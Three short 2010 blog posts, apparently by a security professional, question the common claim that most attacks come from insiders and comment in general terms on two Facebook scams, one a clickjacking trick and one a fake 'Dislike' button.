Friday, August 27, 2010

Verizon's Insider Threat

You've heard the psuedo-axiomatic bull-puckey that 80% of attacks are internal. As if this were universally true everywhere on Earth and everyone just "knows" this fact, like they know the hue of the sky.

Somewhere along the way (I was hearing this when I first got into infosec in the mid 90's) some government study came to this conclusion. Quite possibly the CSI/FBI computer crime surveys were at the root, I really don't know and it really doesn't matter.

I'm not saying there isn't insider threat. Or that insider access increases impact of successful attacks thus increasing risk. I'm not even particularly disagreeing with 80% because I'm sure there are cases where that figure is accurate.

But we as infosec professionals have to understand our own unique threats rather than blindly quoting some nearly urban-legendary statistics as if it applies everywhere.

Verizon's insider threat data, according to this article, lends some credence to the notion of insider threat being a big deal. Where bigness of deal varies from company to company. It also suggests that the problem--at Verizon, specifically--isn't as bad as the oft-quoted 80%.

Less interesting than the actual numbers, to me, is the fact that they collect these metrics in the first place. Do you?  Should you?  I think so.  How do/would you go about it?

And at the same time remain mindful of the fact that we don't know what we don't know? I hate it when infosec professionals tell me, for example, "we've had xxx incidents this year" and forget to add on the phrase "that we know of".

Thursday, August 19, 2010

Facebook Clickjacking Scam

More bad things on Facebook: This Network World article speaks of a Facebook clickjacking scam that entices users to view some photos or some such. It hides a functional Share button underneath a Next button with some social engineering that entices users to click, unknowningly spreading the worm/thingy, then they are taken to a survey that generates money for the scammers.

No Script detects the attack. Cool. I've just started using this add on myself. It seems to add a pretty solid layer of defense to Firefox.

Wednesday, August 18, 2010

Facebook Dislike Button Scam

All you overly paranoid Infosec people who scoff at the slightest hint of risk taking can just take a chill pill right now. It'll take you a few years to learn--and I hope you do learn for the sake of the companies you're supposed to be protecting--that there's no place for ultra paranoia in the business world.  Maybe I'll explain that in another post.

I bring up this point because I can just hear some infosec folks sniffing arrogantly when I admit that I use Facebook. Well, guess what, I am balancing risk versus benefit, something those sniffly infosec people should try sometime.

There are risks I'm taking using Facebook and, in fact, I did get partially snookered by the Facebook Dislike Button Scam. In that I clicked "like" when I saw the thing. I didn't actually use it.  And I'd like to believe that if I had, I'd get suspicious of it trying to do a survey and I would disallow access to it in the end.

Guess what, social engineering works beautifully, even occasionally on an infosec pro. There's no way to reliably patch wetware against it.

The best we can do is achieve a reasonable, helpful level of paranoia that prevents us from doing overly stupid things.

Then hope the rest of our technology defenses protect us from our slightly stupid mistakes.